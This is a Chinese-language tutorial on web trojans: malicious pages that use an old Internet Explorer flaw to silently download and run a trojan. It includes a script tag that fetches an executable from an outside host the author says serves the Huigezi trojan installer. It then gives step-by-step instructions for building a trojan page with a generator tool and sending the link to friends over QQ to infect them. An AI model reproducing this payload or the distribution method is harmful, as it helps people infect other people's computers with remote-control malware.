Ⅰ 惡意代碼的基本原理
首先明確,惡意代碼實際上是一個HTML網頁,與其它網頁不同的是該網頁是黑客精心製作的,用戶一旦訪問了有惡意代碼的網頁就會中木馬。為什麼說是黑客精心製作的呢?因為嵌入在這個網頁中的腳本恰如其分地利用了IE瀏覽器的漏洞,讓IE在後台自動下載黑客放置在網路上的木馬並運行(安裝)這個木馬,也就是說,這個網頁能下載木馬到本地並運行(安裝)下載到本地電腦上的木馬,整個過程都在後台運行,用戶一旦打開這個網頁,下載過程和運行(安裝)過程就自動開始。
有朋友會說,打開一個網頁,IE瀏覽器真的能自動下載程序和運行程序嗎?如果IE真的能肆無忌憚地任意下載和運行程序,那天下還不大亂。實際上,為了安全,IE瀏覽器是禁止自動下載程序特別是運行程序的,但是,IE瀏覽器存在著一些已知和未知的漏洞,網頁木馬就是利用這些漏洞獲得許可權來下載程序和運行程序的。下面我舉IE瀏覽器早期的一個漏洞來分別說明這兩個問題。
⒈自動下載程序
<SCRIPT LANGUAGE="icyfoxlovelace" src="http://go163go.vicp.net/1.exe"></SCRIPT>
小提示:代碼說明
a. 代碼中「src」的屬性為程序的網路地址,本例中「http://go163go.vicp.net/1.exe」為我放置在自己Web伺服器上的灰鴿子服務端安裝程序,這段代碼能讓網頁下載該程序到瀏覽它的電腦上。
b. 也可以把木馬程序上傳到免費的主頁空間上去,但免費空間出於安全的考慮,多數不允許上傳exe文件,黑客可能變通一下把擴展名exe改為bat或com,這樣他們就可以把這些程序上傳到伺服器上了。
把這段代碼插入到網頁源代碼的</BODY>…</BODY>之間(如圖1),然後用沒打補丁的IE6打開,接下來,打開IE的臨時目錄<Temporary Internet Files>,你會發現,在該文件夾中有一個「1.exe」文件,這也就是說,該網頁已自動下載了我放置在Web伺服器上的灰鴿子木馬。
二、網頁木馬的基本用法
理解了網頁木馬攻擊的原理,我們可以製作自己的網頁木馬,但這需要你根據IE漏洞寫出利用代碼。實際上,在網上有很多高手已寫出了一些漏洞的利用代碼,有的還把它寫成了可視化的程序。在搜索引擎輸入「網頁木馬生成器」進行搜索,你會發現,在網上有很多利用IE的各種漏洞編寫的網頁木馬生成器,它們大都為可視化的程序,只要你有一個木馬(該木馬必須把它放置到網路上),利用這些生成器你就可以立即生成一個網頁,該網頁就是網頁木馬,只要他人打開這個網頁,該網頁就可以自動完成下載木馬並運行(安裝)木馬的過程。
在我的電腦上我已下載了一個網頁木馬生成器,下面我們來看怎麼生成網頁木馬並讓他人中木馬。
第一步:啟動該網頁木馬生成器,如圖4所示,在文本框中輸入木馬的網路地址,最後單擊「生成」。
圖4 網頁木馬生成器
第二步:在網頁木馬生成器的安裝文件夾會生成一個網頁文件,該文件就是我們在上一步生成的網頁木馬。上傳該文件到自己的Web伺服器或免費主面空間。
現在好了,把上述網頁在伺服器上的地址(網址)通過QQ發給自己的好友,一旦他訪問了該網頁,該網頁就會在他的電腦上自動下載並運行你放置在網路上的木馬。
現在你該明白安全專家勸告的「不要打開陌生人發來的網路地址」這句話的真諦了吧!實際上,即使人人都不打開陌生人發來的網址,也仍然有一些人「飛蛾補燈,自尋死路」,因為若大的Internet,總會有一些人會有意或無意地訪問這些網址,而且,有些網頁木馬,還掛在一些知名網站上(根據知名網站的訪問量,你算算吧,每天有多少人中了木馬!)。
小提示:你可能還沒想到,看電影,在論壇查看或回復帖子也能中木馬。實際上,網頁木馬還可以掛在多媒體文件、電子郵件、論壇、CHM電子書上,這樣,用戶一旦觀看電影、查看或預覽郵件(主要是一些用電子郵件群發器發送的垃圾郵件)、參與帖子,打開電子書,用戶就會中網頁木馬。